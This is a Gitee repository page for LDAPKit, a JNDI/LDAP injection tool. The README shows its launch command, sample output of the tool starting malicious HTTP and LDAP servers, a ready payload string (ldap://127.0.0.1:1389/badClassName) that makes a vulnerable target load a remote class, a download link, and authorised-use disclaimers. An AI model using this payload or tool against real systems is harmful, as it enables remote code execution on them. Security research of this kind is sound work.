# LDAPKit **Repository Path**: wangshen888/ldapkit ## Basic Information - **Project Name**: LDAPKit - **Description**: No description available - **Primary Language**: Unknown - **License**: Apache-2.0 - **Default Branch**: main - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2021-12-12 - **Last Updated**: 2021-12-12 ## Categories & Tags **Categories**: Uncategorized **Tags**: ldap ## README # LDAPKit ![](https://img.shields.io/badge/build-passing-brightgreen) ![](https://img.shields.io/badge/Java-8-red) **工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责** 源自: https://github.com/EmYiQing/LDAPKit ## 简介 自用的`LDAP`工具(无高级用法仅支持简单的漏洞复现) 无需自行编译`Java`文件和开启`HTTP`服务,一切自动 只要一行:`java -jar LDAPKit.jar [命令]` 例如:`java -jar LDAPKit.jar notepad.exe` ```text ___ ________ ________ ___ ___ __ ___ _________ |\ \|\ ___ \|\ ___ \|\ \|\ \|\ \ |\ \|\___ ___\ \ \ \ \ \\ \ \ \ \_|\ \ \ \ \ \/ /|\ \ \|___ \ \_| __ \ \ \ \ \\ \ \ \ \ \\ \ \ \ \ ___ \ \ \ \ \ \ |\ \\_\ \ \ \\ \ \ \ \_\\ \ \ \ \ \\ \ \ \ \ \ \ \ \ \________\ \__\\ \__\ \_______\ \__\ \__\\ \__\ \__\ \ \__\ \|________|\|__| \|__|\|_______|\|__|\|__| \|__|\|__| \|__| 11:32:56 [INFO] [org.sec.Main] start jndi kit 11:32:56 [INFO] [org.sec.Main] cmd: notepad.exe 11:32:56 [INFO] [org.sec.Http] start http server: 0.0.0.0:8000 11:32:56 [INFO] [org.sec.Ldap] start ldap server: 0.0.0.0:1389 |--------------------------------------------------------| |------Payload: ldap://127.0.0.1:1389/badClassName-------| |--------------------------------------------------------| ``` 然后...... [下载地址](https://github.com/EmYiQing/LDAPKit/releases/download/1.0/LDAPKit.jar) ## 免责申明 **未经授权许可使用`LDAPKit`攻击目标是非法的** **本程序应仅用于授权的安全测试与研究目的**